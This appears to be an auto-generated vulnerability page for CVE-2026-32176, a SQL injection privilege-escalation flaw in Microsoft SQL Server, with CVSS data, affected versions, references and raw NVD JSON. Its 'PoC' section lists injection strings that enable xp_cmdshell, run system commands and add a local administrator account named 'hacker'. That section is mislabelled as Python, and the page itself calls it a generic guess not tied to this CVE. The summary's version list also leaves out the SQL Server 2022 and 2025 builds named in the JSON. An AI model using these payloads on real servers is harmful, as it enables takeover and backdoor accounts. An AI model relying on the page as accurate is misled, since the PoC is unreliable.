CVE-2026-32176

Description

Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:* - VULNERABLE

Microsoft SQL Server (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- SQL Injection Proof of Concept for Privilege Escalation
-- Assume there is a vulnerable parameter in a stored procedure or dynamic SQL

-- Step 1: Attempt to inject a payload to enable advanced commands (e.g., xp_cmdshell)
-- Vulnerable Input: '; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; --

-- Step 2: Enable xp_cmdshell if disabled
-- Vulnerable Input: '; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

-- Step 3: Execute system command as the SQL Server service account (often SYSTEM)
-- Vulnerable Input: '; EXEC master..xp_cmdshell 'whoami'; --

-- Step 4: Add a new user to the administrators group
-- Vulnerable Input: '; EXEC master..xp_cmdshell 'net user hacker P@ssw0rd /add'; --
-- Vulnerable Input: '; EXEC master..xp_cmdshell 'net localgroup administrators hacker /add'; --

-- Note: This is a generic example based on the SQL Injection description.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32176
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32176
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32176/
[4] VulDB https://vuldb.com/cve/CVE-2026-32176
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32176

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32176", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:20.013", "lastModified": "2026-05-07T19:52:49.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:*", "versionStartIncluding": "13.0.6300.2", "versionEndExcluding": "13.0.6485.1", "matchCriteriaId": "8BABE301-AB13-4B54-847B-F67EC92CD96C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:*", "versionStartIncluding": "13.0.7000.253", "versionEndExcluding": "13.0.7080.1", "matchCriteriaId": "31FD6563-A0B9-48C9-BA0B-BF256BFC466D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:*", "versionStartIncluding": "14.0.1000.169", "versionEndExcluding": "14.0.2105.1", "matchCriteriaId": "02D807B3-0DE8-4E79-AE5A-574AD32834D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:*", "versionStartIncluding": "14.0.3006.16", "versionEndExcluding": "14.0.3525.1", "matchCriteriaId": "F8B94B39-1964-486F-9532-5557C87AFC87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:*", "versionStartIncluding": "15.0.2000.5", "versionEndExcluding": "15.0.2165.1", "matchCriteriaId": "EA4AB606-8B66-4C89-8773-4DA1E25FB2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:*", "versionStartIncluding": "15.0.4003.23", "versionEndExcluding": "15.0.4465.1", "matchCriteriaId": "450ADCF3-0476-4CBE-A0F6-28AE90E9E874"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2022:*:*:*:*:*:*:x64:*", "versionStartIncluding": "16.0.1000.6", "versionEndExcluding": "16.0.1175.1", "matchCriteriaId": "FE44A0AE-ECDE-4348-923B-205C691E87DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2022:*:*:*:*:*:*:x64:*", "versionStartIncluding": "16.0.4003.1", "versionEndExcluding": "16.0.4250.1", "matchCriteriaId": "4BFEE9EB-DB7B-490D-AF61-A0162F9FE782"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2025:*:*:*:*:*:*:x64:*", "versionStartIncluding": "17.0.1000.7", "versionEndExcluding": "17.0.1110.1", "matchCriteriaId": "FC0EA29C-9CF8-4ED7-B726-BBACF39DA1A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2025:*:*:*:*:*:*:x64:*", "versionStartIncluding": "17.0.4006.2", "versionEndExcluding": "17.0.4030.1", "matchCriteriaId": "8220A87D-84FB-43FA-8DF0-2B4D50E69164"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32176", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}